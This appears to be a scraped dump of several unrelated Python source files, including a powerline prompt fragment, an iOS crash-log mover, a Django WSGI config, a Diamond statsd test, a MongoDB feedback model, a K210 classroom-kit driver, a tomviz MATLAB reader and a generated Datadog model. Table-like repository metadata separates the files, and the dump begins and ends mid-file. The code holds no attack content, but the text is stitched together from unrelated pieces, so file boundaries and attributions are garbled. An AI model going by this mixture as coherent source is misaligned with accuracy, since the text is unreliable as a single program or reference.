    arg_parser.add_argument('--remote-hostname', action='store_true',
        help='Display the hostname only if on a remote machine')
    arg_parser.add_argument('--shell', action='store', default='bash',
        help='Set this to your shell type', choices=['bash', 'zsh', 'bare'])
    arg_parser.add_argument('prev_error', nargs='?', type=int, default=0,
        help='Error code returned by the last command')
    args = arg_parser.parse_args()
    # build the prompt object rooted at a guaranteed-valid working directory
    powerline = Powerline(args, get_valid_cwd())
| 35.412162 | 86 | 0.58901 |
79553a34161cc1fb9df2106135e662d55e330b6d | 4,258 | py | Python | lib/3rdparty/osx/MobileDevice/crashmover.py | tommo/gii | 03624a57cf74a07e38bfdc7f53c50bd926b7b5a7 | [
"MIT"
] | 7 | 2016-02-13T18:47:23.000Z | 2020-07-03T13:47:49.000Z | crashmover.py | db17/MobileDevice | 11dee1a63030fc5d1e459cac88e7f2716a7811f6 | [
"MIT"
] | 1 | 2018-06-13T04:55:27.000Z | 2021-11-05T05:52:51.000Z | crashmover.py | db17/MobileDevice | 11dee1a63030fc5d1e459cac88e7f2716a7811f6 | [
"MIT"
] | 4 | 2016-02-15T13:32:46.000Z | 2019-12-12T17:22:31.000Z | #!/usr/bin/python
# coding: utf-8
# Copyright (c) 2013 Mountainstorm
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from MobileDevice import *
from amdevice import *
from plistservice import *
import os
import time
class CrashMover(object):
    u'''Moves crash logs from their various scattered locations into the afc
    crash log directory'''
    def __init__(self, amdevice):
        # the service handle is a raw file descriptor (None on failure)
        self.s = amdevice.start_service(u'com.apple.crashreportmover')
        if self.s is None:
            raise RuntimeError(u'Unable to launch: com.apple.crashreportmover')
    def disconnect(self):
        # close the service connection's file descriptor
        os.close(self.s)
    def move_crashlogs(self, extensions=None):
        u'''Moves all crash logs into the afc crash log directory
        Arguments:
        extensions -- if present a list of crash file extensions to move
        XXX not currently working
        '''
        # XXX should we wait just in case?
        time.sleep(2)
        # The service replies with a literal "ping" once the move is done.
        # NOTE(review): Python-2-era code -- under Python 3 os.read returns
        # bytes, so `buf == 'ping'` can never be true and this loop would
        # never terminate.  It also never terminates if the service sends
        # anything other than exactly "ping".  Confirm before porting.
        buf = os.read(self.s, 1)
        while True:
            buf += os.read(self.s, 1)
            if buf == 'ping':
                break # done!
def register_argparse_crashmover(cmdargs):
    # Registers the "crash move" / "crash get" sub-commands on the shared
    # argparse sub-parser collection *cmdargs*.
    import argparse
    import sys
    import afccrashlogdirectory
    import posixpath
    import stat
    def cmd_crashmove(args, dev):
        # consolidate on-device crash logs into the AFC crash directory
        cm = CrashMover(dev)
        cm.move_crashlogs()
        cm.disconnect()
    def get_logs(afc, path, dest):
        # recursively copy the AFC directory *path* into local *dest*
        dirlist = []
        for name in afc.listdir(path):
            info = afc.lstat(posixpath.join(path, name))
            if info.st_ifmt == stat.S_IFDIR:
                # remember sub-directories; recurse after the file pass
                dirlist.append((
                    posixpath.join(path, name),
                    os.path.join(dest, name)
                ))
                try:
                    os.mkdir(os.path.join(dest, name))
                except OSError:
                    pass # it already exists
            elif info.st_ifmt == stat.S_IFLNK:
                pass # XXX handle symlinks e.g. LatestCrash*
            else:
                # plain file: stream device -> local copy
                s = afc.open(posixpath.join(path, name), u'r')
                d = open(os.path.join(dest, name), u'w+')
                d.write(s.readall())
                d.close()
                s.close()
        for names in dirlist:
            get_logs(afc, names[0], names[1])
    def del_logs(afc, path):
        # recursively delete everything below the AFC directory *path*
        dirlist = []
        for name in afc.listdir(path):
            info = afc.lstat(posixpath.join(path, name))
            if info.st_ifmt == stat.S_IFDIR:
                dirlist.append(posixpath.join(path, name))
            else:
                afc.remove(posixpath.join(path, name))
        for name in dirlist:
            del_logs(afc, name)
            afc.remove(name)
    def cmd_crashget(args, dev):
        # move the crashes
        cm = CrashMover(dev)
        cm.move_crashlogs()
        cm.disconnect()
        # retrieve the crashes
        afc = afccrashlogdirectory.AFCCrashLogDirectory(dev)
        get_logs(afc, u'/', args.dest.decode(u'utf-8'))
        # optionally, delete the crashes
        if args.delete_logs:
            del_logs(afc, u'/')
        afc.disconnect()
    # cmd_crashmove command
    crashparser = cmdargs.add_parser(
        u'crash',
        help=u'manipulates crash logs'
    )
    crashcmd = crashparser.add_subparsers()
    crashmovecmd = crashcmd.add_parser(
        u'move',
        help=u'moves crash logs into the afc directory'
    )
    crashmovecmd.set_defaults(func=cmd_crashmove)
    # get the crash logs
    crashgetcmd = crashcmd.add_parser(
        u'get',
        help=u'retrieves crash logs from the device'
    )
    crashgetcmd.add_argument(
        u'-d',
        dest=u'delete_logs',
        action=u'store_true',
        help=u'if specified, delete the crash logs after retrieval'
    )
    crashgetcmd.add_argument(
        u'dest',
        help=u'destination directory; files are appended into it'
    )
    crashgetcmd.set_defaults(func=cmd_crashget)
| 27.649351 | 80 | 0.716768 |
79553a9fa1b80d1ef8326a60f1a7d5072d08ac88 | 855 | py | Python | bespin/wsgi.py | Duke-GCB/bespin-api | cea5c20fb2ff592adabe6ebb7ca934939aa11a34 | [
"MIT"
] | null | null | null | bespin/wsgi.py | Duke-GCB/bespin-api | cea5c20fb2ff592adabe6ebb7ca934939aa11a34 | [
"MIT"
] | 137 | 2016-12-09T18:59:45.000Z | 2021-06-10T18:55:47.000Z | bespin/wsgi.py | Duke-GCB/bespin-api | cea5c20fb2ff592adabe6ebb7ca934939aa11a34 | [
"MIT"
] | 3 | 2017-11-14T16:05:58.000Z | 2018-12-28T18:07:43.000Z | """
WSGI config for bespin project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Select the production settings module before any Django machinery loads.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bespin.settings_prod")
# WSGI environ variables copied into os.environ on every request so the
# production settings module can read them (see application() below).
env_variables_to_pass = [
    'BESPIN_SECRET_KEY',
    'BESPIN_ALLOWED_HOST',
    'BESPIN_DB_NAME',
    'BESPIN_DB_USER',
    'BESPIN_DB_PASSWORD',
    'BESPIN_DB_HOST',
    'BESPIN_CORS_HOST',
    'BESPIN_STATIC_ROOT',
]
def application(environ, start_response):
    """WSGI entry point.

    Copies the deployment-specific variables from the per-request WSGI
    environ into ``os.environ`` so ``bespin.settings_prod`` can read them,
    then delegates to the Django WSGI handler.
    """
    # pass the WSGI environment variables on through to os.environ
    for var in env_variables_to_pass:
        os.environ[var] = environ.get(var, '')
    # perf fix: build the Django handler once and reuse it.  Django caches
    # its settings after the first load anyway, so re-creating the handler
    # on every request (as before) only added overhead without changing
    # behaviour.
    if application._handler is None:
        application._handler = get_wsgi_application()
    return application._handler(environ, start_response)


# one-time cache for the Django WSGI handler (see application() above)
application._handler = None
| 25.909091 | 78 | 0.750877 |
79553b99342f6d48c8e47b8a83d504013a44f32b | 877 | py | Python | germanium/patch.py | jsilhan/germanium | f7df0f3adfd13d9a9eb0b2e1ee691099ca55527a | [
"MIT"
] | null | null | null | germanium/patch.py | jsilhan/germanium | f7df0f3adfd13d9a9eb0b2e1ee691099ca55527a | [
"MIT"
] | null | null | null | germanium/patch.py | jsilhan/germanium | f7df0f3adfd13d9a9eb0b2e1ee691099ca55527a | [
"MIT"
] | null | null | null |
def patch_broken_pipe_error():
"""Monkey Patch BaseServer.handle_error to not write
a stacktrace to stderr on broken pipe.
http://stackoverflow.com/a/22618740/362702"""
import sys
from socketserver import BaseServer
from wsgiref import handlers
handle_error = BaseServer.handle_error
log_exception = handlers.BaseHandler.log_exception
def is_broken_pipe_error():
type, err, tb = sys.exc_info()
return repr(err) == "error(32, 'Broken pipe')"
def my_handle_error(self, request, client_address):
if not is_broken_pipe_error():
handle_error(self, request, client_address)
def my_log_exception(self, exc_info):
if not is_broken_pipe_error():
log_exception(self, exc_info)
BaseServer.handle_error = my_handle_error
handlers.BaseHandler.log_exception = my_log_exception
| 32.481481 | 57 | 0.711517 |
79553bd45c868adcf00ba5bad9715cca2e4e5372 | 2,336 | py | Python | app/customer/models/feedback.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | 2 | 2017-12-02T13:58:30.000Z | 2018-08-02T17:07:59.000Z | app/customer/models/feedback.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | null | null | null | app/customer/models/feedback.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | null | null | null | #coding=utf-8
from mongoengine import *
import logging
import datetime
from app.customer.models.user import *
from django.db import models
from base.settings import CHATPAMONGO
connect(CHATPAMONGO.db, host=CHATPAMONGO.host, port=CHATPAMONGO.port, username=CHATPAMONGO.username,
password=CHATPAMONGO.password)
class FeedbackInfo(Document):
    """MongoDB document (mongoengine) holding one user feedback entry.

    NOTE(review): this file uses Python 2 syntax (``except Exception,e``);
    keep it on a py2 interpreter or port deliberately.
    """
    # Read/processing states; stored in ``status`` below.
    STATUS = [
        (0, u'未读'),
        (1, u'已读'),
        (2, u'已解决'),
        (3, u'暂缓解决'),
    ]
    user_id = IntField(verbose_name=u'用户id', required=True)
    created_at = DateTimeField(verbose_name=u'创建时间', default=None)
    user_agent = StringField(verbose_name=u'ua', max_length=256, default='')
    desc = StringField(verbose_name=u'问题描述', max_length=65535, default='')
    phone_number=StringField(verbose_name=u'电话号码',max_length=16, default='')
    qq_number=StringField(verbose_name=u'qq号码', max_length=32, default='')
    status = IntField(verbose_name=u"处理状态", default=0)  # 0: unhandled, 1: handled, 2: ignored
    update_time = DateTimeField(verbose_name=u"处理时间")
    operator = StringField(verbose_name=u"操作人")
    operaterecord = StringField(verbose_name=u"操作记录")
    is_answer = IntField(verbose_name=u'是否回复', default=0)  # 0: not replied, 1: replied
    class Meta:
        app_label = "customer"
        verbose_name = u"反馈"
        verbose_name_plural = verbose_name
    @classmethod
    def create_feedback(cls, user_id, created_at, ua='', desc='', phone_number='',qq_number=''):
        """Create and save a feedback document.

        Returns the new document id as a string, or False when saving fails
        (the error is logged, not re-raised).
        """
        try:
            feedback = FeedbackInfo(
                user_id=user_id,
                created_at=created_at,
                status=0,
                user_agent=ua,
                desc=desc,
                phone_number=phone_number,
                qq_number=qq_number,
            )
            feedback.save()
        except Exception,e:
            logging.error("create feedback error:{0}".format(e))
            return False
        return str(feedback.id)
    @classmethod
    def check_feedback(cls, user_id, created_at):
        """Return True when the user already filed feedback on the same calendar day
        as *created_at*; False otherwise (including when no feedback exists)."""
        feedbacks = FeedbackInfo.objects.filter(user_id=user_id).order_by('-created_at')
        if not feedbacks:
            return False
        else:
            last_time = feedbacks.first().created_at
            # Compare only the date part — at most one feedback counted per day.
            if created_at.strftime('%Y-%m-%d') == last_time.strftime('%Y-%m-%d'):
                return True
            else:
                return False
| 33.855072 | 100 | 0.624572 |
79553d1b156155b6ca4af72f7193f633478d5328 | 3,398 | py | Python | src/diamond/handler/test/teststatsdhandler.py | kevinrobinson/Diamond-1 | a15c4c178d9cc0c1c111652a8a6323206a9f31ac | [
"MIT"
] | 6 | 2015-04-13T21:24:24.000Z | 2020-05-11T07:43:05.000Z | src/diamond/handler/test/teststatsdhandler.py | kevinrobinson/Diamond-1 | a15c4c178d9cc0c1c111652a8a6323206a9f31ac | [
"MIT"
] | 3 | 2015-09-11T16:29:54.000Z | 2016-05-18T15:31:54.000Z | src/diamond/handler/test/teststatsdhandler.py | kevinrobinson/Diamond-1 | a15c4c178d9cc0c1c111652a8a6323206a9f31ac | [
"MIT"
] | 13 | 2015-01-11T12:10:45.000Z | 2021-01-27T10:55:02.000Z | #!/usr/bin/python
# coding=utf-8
################################################################################
from test import unittest
from test import run_only
from mock import patch
from mock import ANY
import configobj
from diamond.handler.stats_d import StatsdHandler
from diamond.metric import Metric
try:
import statsd
statsd # Pyflakes
except ImportError:
pass
def run_only_if_statsd_is_available(func):
    """Decorator: run *func* only when the optional ``statsd`` package imports."""
    try:
        import statsd  # noqa: F401 -- presence check only
        available = True
    except ImportError:
        available = False
    return run_only(func, lambda: available)
class TestStatsdHandler(unittest.TestCase):
    """Unit tests for diamond's StatsdHandler, with the statsd client mocked."""
    @run_only_if_statsd_is_available
    @patch('statsd.Client')
    def test_single_gauge(self, mock_client):
        """A GAUGE metric is sent as '<raw_value>|g'."""
        instance = mock_client.return_value
        instance._send.return_value = 1
        config = configobj.ConfigObj()
        config['host'] = 'localhost'
        config['port'] = '9999'
        config['batch'] = 1
        metric = Metric('servers.com.example.www.cpu.total.idle',
                        123, raw_value=123, timestamp=1234567,
                        host='will-be-ignored', metric_type='GAUGE')
        expected_data = {
            'servers.com.example.www.cpu.total.idle': '123|g'
        }
        handler = StatsdHandler(config)
        handler.process(metric)
        mock_client._send.assert_called_with(ANY, expected_data)
    @run_only_if_statsd_is_available
    @patch('statsd.Client')
    def test_single_counter(self, mock_client):
        """A COUNTER metric sends its raw_value as '<raw_value>|c'."""
        instance = mock_client.return_value
        instance._send.return_value = 1
        config = configobj.ConfigObj()
        config['host'] = 'localhost'
        config['port'] = '9999'
        config['batch'] = 1
        metric = Metric('servers.com.example.www.cpu.total.idle',
                        5, raw_value=123, timestamp=1234567,
                        host='will-be-ignored', metric_type='COUNTER')
        expected_data = {
            'servers.com.example.www.cpu.total.idle': '123|c'
        }
        handler = StatsdHandler(config)
        handler.process(metric)
        mock_client._send.assert_called_with(ANY, expected_data)
    @run_only_if_statsd_is_available
    @patch('statsd.Client')
    def test_multiple_counter(self, mock_client):
        """Consecutive COUNTER metrics: the second send carries the raw_value
        delta (128 - 123 = 5) — presumably the handler tracks the last raw
        value per counter; confirm against StatsdHandler.process."""
        instance = mock_client.return_value
        instance._send.return_value = 1
        config = configobj.ConfigObj()
        config['host'] = 'localhost'
        config['port'] = '9999'
        config['batch'] = 1
        metric1 = Metric('servers.com.example.www.cpu.total.idle',
                         5, raw_value=123, timestamp=1234567,
                         host='will-be-ignored', metric_type='COUNTER')
        metric2 = Metric('servers.com.example.www.cpu.total.idle',
                         7, raw_value=128, timestamp=1234567,
                         host='will-be-ignored', metric_type='COUNTER')
        expected_data1 = {
            'servers.com.example.www.cpu.total.idle': '123|c'
        }
        expected_data2 = {
            'servers.com.example.www.cpu.total.idle': '5|c'
        }
        handler = StatsdHandler(config)
        handler.process(metric1)
        mock_client._send.assert_called_with(ANY, expected_data1)
        handler.process(metric2)
        mock_client._send.assert_called_with(ANY, expected_data2)
| 30.339286 | 80 | 0.607416 |
79553e12135f53622811ea41908d23e0393e6506 | 7,513 | py | Python | ports/esp32/modules/mpython_classroom_kit.py | ghsecuritylab/mPython-classroom-kit | c58c124b2268af328277183bd3d018c3aee744e1 | [
"MIT"
] | null | null | null | ports/esp32/modules/mpython_classroom_kit.py | ghsecuritylab/mPython-classroom-kit | c58c124b2268af328277183bd3d018c3aee744e1 | [
"MIT"
] | null | null | null | ports/esp32/modules/mpython_classroom_kit.py | ghsecuritylab/mPython-classroom-kit | c58c124b2268af328277183bd3d018c3aee744e1 | [
"MIT"
] | null | null | null | # labplus mPython-box library
# MIT license; Copyright (c) 2018 labplus
# mpython-box buildin periphers drivers
# history:
# V1.0 zhaohuijiang
from machine import Pin, ADC
import time, ujson
from mpython_classroom_kit_driver import K210,K210Error
from mpython import i2c
import ubinascii
# human infrared
pir = Pin(21, mode=Pin.IN, pull=None)
# slide POT
slider_res = ADC(Pin(34))
slider_res.atten(slider_res.ATTN_11DB)
k210 = K210()
def get_distance():
    """Ultrasonic distance sensor; range 2~340 cm."""
    return k210.get_distance()
def get_key():
    """Direction keys: return the set of names of currently pressed keys."""
    names = {0: 'left', 1: 'right', 2: 'up', 3: 'down', 4: 'ok'}
    bitmask = k210.get_key()
    if not bitmask:
        return set()
    # One bit per key, bit 0 = 'left' ... bit 4 = 'ok'.
    return {names[bit] for bit in range(5) if (bitmask >> bit) & 0x01}
def set_motor(speed):
    """Drive the motor at *speed* percent; valid range is -100..100."""
    if speed > 100 or speed < -100:
        raise ValueError("Invalid value,Range in -100~100")
    return k210.set_motor(speed)
def k210_reset():
    """Reset the K210 co-processor."""
    k210.reset()
"""k210文件传送"""
def filefrom_k210(source,target=None):
    """Copy file *source* from the K210 filesystem into local file *target*
    (defaults to the same name).

    Data arrives base64-encoded in chunks of 512*3 bytes — a multiple of 3 so
    each chunk decodes without padding; an empty decoded chunk marks EOF.
    """
    k210.file_open(source,'rb')
    if target ==None:
        target = source
    with open(target,'wb') as temp:
        while True:
            base_64_data= k210.file_read(512*3)
            churk=ubinascii.a2b_base64(base_64_data)
            if churk != b'':
                temp.write(churk)
            else:
                break
    k210.file_close()
def fileto_k210(source,target=None):
    """Copy local file *source* to the K210 filesystem as *target*
    (defaults to the same name).

    Data is sent base64-encoded in chunks of 512*3 bytes; an empty encoded
    chunk (end of local file) terminates the transfer.
    """
    if target ==None:
        target = source
    k210.file_open(target,'wb')
    with open(source,'rb') as temp:
        while True:
            buf = temp.read(512*3)
            base64_data = ubinascii.b2a_base64(buf).strip()
            if base64_data != b'':
                k210.file_write(base64_data)
            else:
                break
    k210.file_close()
class Model(object):
    """Accessors for the K210 neural-network models (YOLO / MobileNet)."""
    def __init__(self):
        # Ids of the built-in models, for select_model().
        self.FACE_YOLO = 1
        self.CLASS_20_YOLO = 2
        self.MNIST_NET = 3
        self.CLASS_1000_NET = 4
        # Model-type ids, for load_model(model_type=...).
        self.YOLO2 = 1
        self.MOBILENET = 2
    def select_model(self, builtin=None):
        """Select one of the built-in models."""
        k210.select_model(builtin)
    def load_model(self, path, model_type, classes, anchor=None):
        """Load an external model file from *path*."""
        k210.load_model(path=path, model_type=model_type,
                        classes=classes, anchor=anchor)
    def detect_yolo(self):
        """Run YOLO detection and return its result."""
        return k210.detect_yolo()
    def predict_net(self):
        """Run MobileNet prediction and return its result."""
        return k210.predict_net()
    def deinit_yolo(self):
        """Release the YOLO model."""
        k210.deinit_yolo()
    def deinit_net(self):
        """Release the net model."""
        k210.deinit_net()
class LCD(object):
    """RGB565 colour constants plus drawing proxies for the K210-driven LCD."""
    BLACK = 0
    NAVY = 15
    DARKGREEN = 992
    DARKCYAN = 1007
    MAROON = 30720
    PURPLE = 30735
    OLIVE = 31712
    LIGHTGREY = 50712
    DARKGREY = 31727
    BLUE = 31
    GREEN = 2016
    RED = 63488
    MAGENTA = 63519
    YELLOW = 65504
    WHITE = 65535
    ORANGE = 64800
    GREENYELLOW = 45029
    # NOTE(review): PINK shares MAGENTA's value (63519) — looks copied; confirm upstream.
    PINK = 63519
    def init(self, *args,**kws):
        k210.lcd_init(*args,**kws)
    def display(self,**kws):
        k210.lcd_display(**kws)
    def clear(self, color=0):
        k210.lcd_clear(color=color)
    def draw_string(self, *args):
        k210.lcd_draw_string(*args)
class Camera(object):
    """Proxy to the K210-side camera: sensor setup and capture controls."""
    # Pixel formats accepted by set_pixformat().
    RGB565 = 2
    GRAYSCALE = 4
    def reset(self):
        k210.camera_reset()
    def run(self,*arg):
        k210.camera_run(*arg)
    def snapshot(self):
        k210.camera_snapshot()
    def set_pixformat(self,*arg):
        k210.camera_set_pixformat(*arg)
    def set_contrast(self,*arg):
        # Contrast / brightness / saturation all accept -2..2 inclusive.
        if arg[0] < -2 or arg[0] > 2:
            raise ValueError("Invalid value,Range in -2~2")
        k210.camera_set_contrast(*arg)
    def set_brightness(self,*arg):
        if arg[0] < -2 or arg[0] > 2:
            raise ValueError("Invalid value,Range in -2~2")
        k210.camera_set_brightness(*arg)
    def set_saturation(self,*arg):
        if arg[0] < -2 or arg[0] > 2:
            raise ValueError("Invalid value,Range in -2~2")
        k210.camera_set_saturation(*arg)
    def set_auto_gain(self,*arg,**kw):
        k210.camera_set_auto_gain(*arg,**kw)
    def set_auto_whitebal(self,*arg):
        k210.camera_set_auto_whitebal(*arg)
    def set_windowing(self,*arg):
        k210.camera_set_windowing(*arg)
    def set_hmirror(self,*arg):
        k210.camera_set_hmirror(*arg)
    def set_vflip(self,*arg):
        k210.camera_set_vflip(*arg)
    def skip_frames(self,*arg,**kw):
        k210.camera_skip_frames(*arg,**kw)
class Img(object):
    """Proxy for the K210-side image object; all processing runs on the
    co-processor, so most methods just forward their arguments."""
    def load(self, *args, **kws):
        k210.image_load(*args, **kws)
    def width(self):
        return int(k210.image_width())
    # 'hight' (sic) kept — renaming would break existing user scripts.
    def hight(self):
        return int(k210.image_hight())
    def format(self):
        return int(k210.image_format())
    def size(self):
        return int(k210.image_size())
    def get_pixel(self, *args, **kws):
        # Returns a tuple for a valid pixel, or None for a falsy result.
        temp = k210.image_get_pixel(*args, **kws)
        if temp:
            return tuple(temp)
    def set_pixel(self, *args, **kws):
        k210.image_set_pixel(*args, **kws)
    def mean_pool(self, *args, **kws):
        k210.image_mean_pool(*args, **kws)
    def to_grayscale(self):
        k210.image_to_grayscale()
    def to_rainbow(self):
        k210.image_to_rainbow()
    def copy(self,*args, **kws):
        k210.image_copy(*args, **kws)
    def save(self,*args, **kws):
        k210.image_save(*args, **kws)
    def clear(self):
        k210.image_clear()
    def draw_line(self,*args, **kws):
        k210.image_draw_line(*args, **kws)
    def draw_rectangle(self,*args, **kws):
        k210.image_draw_rectangle(*args, **kws)
    def draw_circle(self,*args, **kws):
        k210.image_draw_circle(*args, **kws)
    def draw_string(self,*args, **kws):
        k210.image_draw_string(*args, **kws)
    def draw_cross(self,*args, **kws):
        k210.image_draw_cross(*args, **kws)
    def draw_arrow(self,*args, **kws):
        k210.image_draw_arrow(*args, **kws)
    def binary(self,*args, **kws):
        k210.image_binary(*args, **kws)
    def invert(self):
        k210.image_invert()
    def erode(self,*args, **kws):
        k210.image_erode(*args, **kws)
    def dilate(self,*args, **kws):
        k210.image_dilate(*args, **kws)
    def negate(self,*args, **kws):
        k210.image_negate(*args, **kws)
    def mean(self,*args, **kws):
        k210.image_mean(*args, **kws)
    def mode(self,*args, **kws):
        k210.image_mode(*args, **kws)
    def median(self,*args, **kws):
        k210.image_median(*args, **kws)
    def midpoint(self,*args, **kws):
        k210.image_midpoint(*args, **kws)
    def cartoon(self,*args, **kws):
        k210.image_cartoon(*args, **kws)
    def conv3(self,*args, **kws):
        k210.image_conv3(*args, **kws)
    def gaussian(self,*args, **kws):
        k210.image_gaussian(*args, **kws)
    def bilateral(self,*args, **kws):
        k210.image_bilateral(*args, **kws)
    def linpolar(self,*args, **kws):
        k210.image_linpolar(*args, **kws)
    def logpolar(self,*args, **kws):
        k210.image_logpolar(*args, **kws)
    def rotation_corr(self,*args, **kws):
        k210.image_rotation_corr(*args, **kws)
    def find_blobs(self,*args, **kws):
        return k210.image_find_blobs(*args, **kws)
    # NOTE(review): delegates to camera_skip_frames — possibly a copy-paste
    # from Camera; confirm intended behavior.
    def skip_frames(self,*arg,**kw):
        k210.camera_skip_frames(*arg,**kw)
# Module-level singletons exposed to user scripts.
lcd = LCD()
camera = Camera()
model = Model()
image = Img()
| 23.625786 | 66 | 0.58858 |
79553ff4b657d4ece17177cd6939286154ee44ef | 1,632 | py | Python | tomviz/python/tomviz/io/formats/matlab.py | alesgenova/tomviz | 4d027585ad81f7a92e055fbf4658e63a8573c55d | [
"BSD-3-Clause"
] | null | null | null | tomviz/python/tomviz/io/formats/matlab.py | alesgenova/tomviz | 4d027585ad81f7a92e055fbf4658e63a8573c55d | [
"BSD-3-Clause"
] | null | null | null | tomviz/python/tomviz/io/formats/matlab.py | alesgenova/tomviz | 4d027585ad81f7a92e055fbf4658e63a8573c55d | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
###############################################################################
#
# This source file is part of the tomviz project.
#
# Copyright Kitware, Inc.
#
# This source code is released under the New BSD License, (the "License").
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###############################################################################
import numpy as np
import scipy.io
from tomviz.io import FileType, IOBase, Reader
import tomviz.utils
from vtk import vtkImageData
class MatlabBase(IOBase):
    """Common base for MATLAB .mat IO classes: declares the file type."""
    @staticmethod
    def file_type():
        # One FileType shared by every MATLAB IO class.
        return FileType('MATLAB binary format', ['mat'])
class MatlabReader(Reader, MatlabBase):
    """Reads the first 3-D numpy array found in a MATLAB .mat file into vtkImageData."""
    def read(self, path):
        """Return vtkImageData for *path*; an empty vtkImageData when no 3-D array exists.

        NOTE(review): iterates mat_dict.values() and takes the first 3-D array —
        relies on there being exactly one per file (see comment below).
        """
        mat_dict = scipy.io.loadmat(path)
        data = None
        for item in mat_dict.values():
            # Assume only one 3D array per file
            if isinstance(item, np.ndarray):
                if len(item.shape) == 3:
                    data = item
                    break
        if data is None:
            return vtkImageData()
        image_data = vtkImageData()
        (x, y, z) = data.shape
        # Unit spacing at the origin; VTK extent is zero-based and inclusive.
        image_data.SetOrigin(0, 0, 0)
        image_data.SetSpacing(1, 1, 1)
        image_data.SetExtent(0, x - 1, 0, y - 1, 0, z - 1)
        tomviz.utils.set_array(image_data, data)
        return image_data
| 27.661017 | 79 | 0.572304 |
79554047150b909c50002b9ff262c7840896c01a | 7,010 | py | Python | src/datadog_api_client/v1/model/widget_text_align.py | MichaelTROEHLER/datadog-api-client-python | 12c46626622fb1277bb1e172753b342c671348bd | [
"Apache-2.0"
] | null | null | null | src/datadog_api_client/v1/model/widget_text_align.py | MichaelTROEHLER/datadog-api-client-python | 12c46626622fb1277bb1e172753b342c671348bd | [
"Apache-2.0"
] | null | null | null | src/datadog_api_client/v1/model/widget_text_align.py | MichaelTROEHLER/datadog-api-client-python | 12c46626622fb1277bb1e172753b342c671348bd | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
import re # noqa: F401
import sys # noqa: F401
import nulltype # noqa: F401
from datadog_api_client.v1.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
class WidgetTextAlign(ModelSimple):
    """How to align the text on the widget: one of "center", "left", "right".

    NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    Attributes:
      allowed_values (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          with a capitalized key describing the allowed value and an allowed
          value. These dicts store the allowed enum values.
      validations (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          that stores validations for max_length, min_length, max_items,
          min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
          inclusive_minimum, and regex.
      additional_properties_type (tuple): A tuple of classes accepted
          as additional properties values.
    """
    allowed_values = {
        ('value',): {
            'CENTER': "center",
            'LEFT': "left",
            'RIGHT': "right",
        },
    }
    validations = {
    }
    additional_properties_type = None
    _nullable = False
    @cached_property
    def openapi_types():
        """
        This must be a method because a model may have properties that are
        of type self, this must run after the class is loaded
        Returns
            openapi_types (dict): The key is attribute name
                and the value is attribute type.
        """
        return {
            'value': (str,),
        }
    @cached_property
    def discriminator():
        return None
    attribute_map = {}
    _composed_schemas = None
    required_properties = set([
        '_data_store',
        '_check_type',
        '_spec_property_naming',
        '_path_to_item',
        '_configuration',
        '_visited_composed_classes',
    ])
    @convert_js_args_to_python_args
    def __init__(self, *args, **kwargs):
        """WidgetTextAlign - a model defined in OpenAPI
        Note that value can be passed either in args or in kwargs, but not in both.
        Args:
            args[0] (str): How to align the text on the widget.., must be one of ["center", "left", "right", ]  # noqa: E501
        Keyword Args:
            value (str): How to align the text on the widget.., must be one of ["center", "left", "right", ]  # noqa: E501
            _check_type (bool): if True, values for parameters in openapi_types
                                will be type checked and a TypeError will be
                                raised if the wrong type is input.
                                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                                drill down to the model in received_data
                                when deserializing a response
            _spec_property_naming (bool): True if the variable names in the input data
                                are serialized names, as specified in the OpenAPI document.
                                False if the variable names in the input data
                                are pythonic names, e.g. snake case (default)
            _configuration (Configuration): the instance to use when
                                deserializing a file_type parameter.
                                If passed, type conversion is attempted
                                If omitted no type conversion is done.
            _visited_composed_classes (tuple): This stores a tuple of
                                classes that we have traveled through so that
                                if we see that class again we will not use its
                                discriminator again.
                                When traveling through a discriminator, the
                                composed schema that is
                                is traveled through is added to this set.
                                For example if Animal has a discriminator
                                petType and we pass in "Dog", and the class Dog
                                allOf includes Animal, we move through Animal
                                once using the discriminator, and pick Dog.
                                Then in Dog, we will make an instance of the
                                Animal class but this time we won't travel
                                through its discriminator because we passed in
                                _visited_composed_classes = (Animal,)
        """
